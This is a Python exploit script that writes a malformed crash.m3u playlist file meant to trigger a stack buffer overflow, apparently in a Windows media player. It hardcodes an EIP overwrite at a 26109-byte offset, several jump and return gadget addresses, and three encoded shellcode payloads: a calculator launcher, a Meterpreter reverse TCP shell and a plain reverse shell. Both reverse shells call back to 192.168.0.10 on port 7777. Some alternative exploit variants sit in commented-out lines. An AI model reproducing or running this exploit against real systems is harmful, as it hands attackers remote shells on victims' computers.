from struct import *

whereIsEip = b'a1234567890b1234567890c1234567890'

# len 144		
calcCorelan = b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" + \
	b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" + \
	b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" + \
	b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" + \
	b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" + \
	b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" + \
	b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" + \
	b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" + \
	b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" + \
	b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" + \
	b"\x7f\xe8\x7b\xca"

#317 #msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=7777 R | msfencode -b '\x00\xff' -v -c 1 -t python
meterpreter = b"\xda\xd5\xd9\x74\x24\xf4\x5f\x2b\xc9\xba\xd1\x89\x9d"+\
	b"\x27\xb1\x49\x31\x57\x19\x03\x57\x19\x83\xc7\x04\x33"+\
	b"\x7c\x61\xcf\x3a\x7f\x9a\x10\x5c\x09\x7f\x21\x4e\x6d"+\
	b"\x0b\x10\x5e\xe5\x59\x99\x15\xab\x49\x2a\x5b\x64\x7d"+\
	b"\x9b\xd1\x52\xb0\x1c\xd4\x5a\x1e\xde\x77\x27\x5d\x33"+\
	b"\x57\x16\xae\x46\x96\x5f\xd3\xa9\xca\x08\x9f\x18\xfa"+\
	b"\x3d\xdd\xa0\xfb\x91\x69\x98\x83\x94\xae\x6d\x39\x96"+\
	b"\xfe\xde\x36\xd0\xe6\x55\x10\xc1\x17\xb9\x43\x3d\x51"+\
	b"\xb6\xb7\xb5\x60\x1e\x86\x36\x53\x5e\x44\x09\x5b\x53"+\
	b"\x95\x4d\x5c\x8c\xe0\xa5\x9e\x31\xf2\x7d\xdc\xed\x77"+\
	b"\x60\x46\x65\x2f\x40\x76\xaa\xa9\x03\x74\x07\xbe\x4c"+\
	b"\x99\x96\x13\xe7\xa5\x13\x92\x28\x2c\x67\xb0\xec\x74"+\
	b"\x33\xd9\xb5\xd0\x92\xe6\xa6\xbd\x4b\x42\xac\x2c\x9f"+\
	b"\xf4\xef\x38\x6c\xca\x0f\xb9\xfa\x5d\x63\x8b\xa5\xf5"+\
	b"\xeb\xa7\x2e\xd3\xec\xc8\x04\xa3\x63\x37\xa7\xd3\xaa"+\
	b"\xfc\xf3\x83\xc4\xd5\x7b\x48\x15\xd9\xa9\xde\x45\x75"+\
	b"\x02\x9e\x35\x35\xf2\x76\x5c\xba\x2d\x66\x5f\x10\x46"+\
	b"\x0c\xa5\xf3\xa9\x78\xa5\x09\x42\x7a\xa6\x13\xf3\xf3"+\
	b"\x40\x41\xe3\x55\xda\xfe\x9a\xfc\x90\x9f\x63\x2b\xdd"+\
	b"\xa0\xe8\xdf\x21\x6e\x19\xaa\x31\x07\xe9\xe1\x68\x8e"+\
	b"\xf6\xdc\x07\x2f\x63\xda\x81\x78\x1b\xe0\xf4\x4f\x84"+\
	b"\x1b\xd3\xdb\x0d\x89\x9c\xb3\x71\x5d\x1d\x44\x24\x37"+\
	b"\x1d\x2c\x90\x63\x4e\x49\xdf\xbe\xe2\xc2\x4a\x40\x53"+\
	b"\xb6\xdd\x28\x59\xe1\x2a\xf7\xa2\xc4\xaa\xc4\x74\x21"+\
	b"\x29\x3c\xf3\x41\xf1"

#317 #msfpayload windows/shell/reverse_tcp LHOST=192.168.0.10 LPORT=7777 R | msfencode -b '\x00\xff' -v -c 1 -t python
shell = b"\xdd\xc1\xbb\xd3\xa3\x5c\x27\xd9\x74\x24\xf4\x58\x2b"+\
	b"\xc9\xb1\x49\x31\x58\x19\x03\x58\x19\x83\xc0\x04\x31"+\
	b"\x56\xa0\xcf\x3c\x99\x59\x10\x5e\x13\xbc\x21\x4c\x47"+\
	b"\xb4\x10\x40\x03\x98\x98\x2b\x41\x09\x2a\x59\x4e\x3e"+\
	b"\x9b\xd7\xa8\x71\x1c\xd6\x74\xdd\xde\x79\x09\x1c\x33"+\
	b"\x59\x30\xef\x46\x98\x75\x12\xa8\xc8\x2e\x58\x1b\xfc"+\
	b"\x5b\x1c\xa0\xfd\x8b\x2a\x98\x85\xae\xed\x6d\x3f\xb0"+\
	b"\x3d\xdd\x34\xfa\xa5\x55\x12\xdb\xd4\xba\x41\x27\x9e"+\
	b"\xb7\xb1\xd3\x21\x1e\x88\x1c\x10\x5e\x46\x23\x9c\x53"+\
	b"\x97\x63\x1b\x8c\xe2\x9f\x5f\x31\xf4\x5b\x1d\xed\x71"+\
	b"\x7e\x85\x66\x21\x5a\x37\xaa\xb7\x29\x3b\x07\xbc\x76"+\
	b"\x58\x96\x11\x0d\x64\x13\x94\xc2\xec\x67\xb2\xc6\xb5"+\
	b"\x3c\xdb\x5f\x10\x92\xe4\x80\xfc\x4b\x40\xca\xef\x98"+\
	b"\xf2\x91\x67\x6c\xc8\x29\x78\xfa\x5b\x59\x4a\xa5\xf7"+\
	b"\xf5\xe6\x2e\xd1\x02\x08\x05\xa5\x9d\xf7\xa6\xd5\xb4"+\
	b"\x33\xf2\x85\xae\x92\x7b\x4e\x2f\x1a\xae\xc0\x7f\xb4"+\
	b"\x01\xa0\x2f\x74\xf2\x48\x3a\x7b\x2d\x68\x45\x51\x46"+\
	b"\x02\xbf\x32\xa9\x7a\xbf\xc8\x41\x78\xc0\xd2\xf0\xf5"+\
	b"\x26\x80\xe2\x53\xf0\x3d\x9a\xfe\x8a\xdc\x63\xd5\xf6"+\
	b"\xdf\xe8\xd9\x07\x91\x18\x94\x1b\x46\xe9\xe3\x46\xc1"+\
	b"\xf6\xde\xed\xee\x62\xe4\xa7\xb9\x1a\xe6\x9e\x8e\x84"+\
	b"\x19\xf5\x84\x0d\x8f\xb6\xf2\x71\x5f\x37\x03\x24\x35"+\
	b"\x37\x6b\x90\x6d\x64\x8e\xdf\xb8\x18\x03\x4a\x42\x49"+\
	b"\xf7\xdd\x2a\x77\x2e\x29\xf5\x88\x05\xab\xca\x5e\x60"+\
	b"\x29\x3a\xd5\x80\xf1"

crash = open("crash.m3u", "wb+")
#26109 base
junk = b'\xcc' * 26109
nop = b'\x90' * 8
pause = b'\xCC' * 16
eip = b'\x93\x43\x91\x7C'
#crash.write(b"\x90" * 880 + calcCorelan + b'\x90' * 25085 + b'\x48\xF7\x10\x00') # \x48\xf7 <-> + nb nop
#crash.write(b"\x90" * 650 + meterpreter + b'\xcc' * 25085 + b'\x48\xF7\x10\x00') # \x48\xf7 <-> + nb nop
#crash.write(junk + b'\x93\x43\x91\x7C' + b'\x90' * 4 + calcCorelan) # junk 26109 #overwrite EIP with call esp
#crash.write(junk + b'\x93\x43\x91\x7C' + b'\x90' * 12 + meterpreter) # junk 26109 #overwrite EIP with call esp
#crash.write(b'\x90'*156 + calcCorelan + b'\x90' * 25809 + b'\x5F\xDF\x87\x7C' + \
#b'XXXX' + b'\x90' * 8 + b'\x1B\x99\x80\x7C' + b'XXXX' + b'\x5F\xDF\x87\x7C' + b'XXXX' + b'\x90'*4 + b'\xC3\x43\x11\x00')
	#pop eax ret			b'\x1B\x99\x80\x7C'  #pop eax pop ebp ret	b'\x5F\xDF\x87\x7C'  #jmp esp 	b'\xC3\x43\x11\x00'
#crash.write( junk + b'\x39\x10\x9C\x7C' + b'XXXX' + b'\x90' * 8 + calcCorelan) # push esp ret
crash.write(junk + b'\x2F\x92\x84\7C' +  pause) # JMP DWORD SS:ESP FF24E4
print("All OK")